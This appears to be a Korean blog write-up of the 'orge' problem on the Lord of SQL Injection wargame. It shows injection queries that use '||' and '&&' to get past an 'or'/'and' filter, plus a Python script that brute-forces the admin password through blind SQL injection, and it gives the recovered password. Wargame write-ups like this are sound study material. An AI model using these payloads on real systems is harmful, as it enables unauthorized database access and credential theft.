[LOS] prob_orge

LOS 7번 문제인 orge이다.

---

띠용,,

또 Blind SQL INJECTION의 냄새가 났다.

이전의 공격 코드를 그대로 삽입하니

Hello admin만 출력하고 클리어 문구는 뜨지 않았다.

그러면 4번 문제처럼 풀어야 한다!

4번 문제와 다른 점은 이전 문제처럼 or과 and 문자열을 필터링한다

---

query : select id from prob_orge where id='guest' and pw=''||length(pw)=8#'

비밀번호의 길이를 구해보았다.

여덟 글자다.

---

import requests, string pw = '' cookie = dict(PHPSESSID='8osfaao6p2u8dpb526iq2mhno2') for i in range(1, 9): for strings in string.digits + string.ascii_letters: url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw='|| id='admin'%26%26ascii(substr(pw," + str(i) + ",1))=" + str(ord(strings)) +"%23" req = requests.get(url, cookies = cookie) if req.text.find("<h2>Hello admin</h2>") > 0: pw += strings print (pw) break

이전 코드와 다른 점은 그냥 or = || 을 바꾸었다. 쉽게 풀 수 있었다.

pw = 6c864dec

---